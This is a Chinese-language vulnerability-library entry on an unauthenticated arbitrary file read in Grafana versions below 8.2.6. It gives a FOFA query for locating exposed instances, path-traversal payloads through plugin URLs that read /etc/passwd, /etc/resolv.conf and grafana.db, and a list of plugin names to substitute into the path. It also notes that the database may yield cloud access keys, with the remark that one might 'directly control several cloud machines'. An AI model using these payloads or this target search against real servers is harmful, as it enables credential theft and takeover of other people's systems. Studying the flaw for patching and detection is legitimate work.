漏洞描述
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
影响范围
Grafana v8.2.6以下
FOFA查询
app=“Grafana”
漏洞复现
payload:
public/plugins/logs/../../../../../../../../etc/resolv.conf
public/plugins/icon/../../../../../../../../etc/resolv.conf
/public/plugins/prometheus/../../../../../../../../../../etc/passwd
/public/plugins/grafana-clock-panel/../../../../../../../../../../../../../etc/passwd
/var/lib/grafana/grafana.db
![图片[1]-Grafana 未授权任意文件读取漏洞-tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/89145b74cd155afa6b9fcabcbb61cac2.jpg#crop=0&crop=0&crop=1&crop=1&id=rJijm&originHeight=1742&originWidth=2844&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)
![图片[2]-Grafana 未授权任意文件读取漏洞-tale-漏洞文库小世界-安全文库-NGC660 安全实验室](http://wiki.tidesec.com/uploads/202205/67f8eb6093d0e838198d7e2f925d333f.jpg#crop=0&crop=0&crop=1&crop=1&id=iVN5U&originHeight=1672&originWidth=2840&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=)
可读取/var/lib/grafana/grafana.db数据库文件,里面可能存在阿里云ecs 腾讯云的ak或者jdbc信息。运气好直接控制几台云机器。
其他插件:
alertmanager
cloud-monitoring
cloudwatch
dashboard
elasticsearch
grafana
grafana-azure-monitor-datasource
graphite
influxdb
jaeger
loki
mixed
mssql
mysql
opentsdb
postgres
prometheus
tempo
testdata
zipkin
请登录后查看回复内容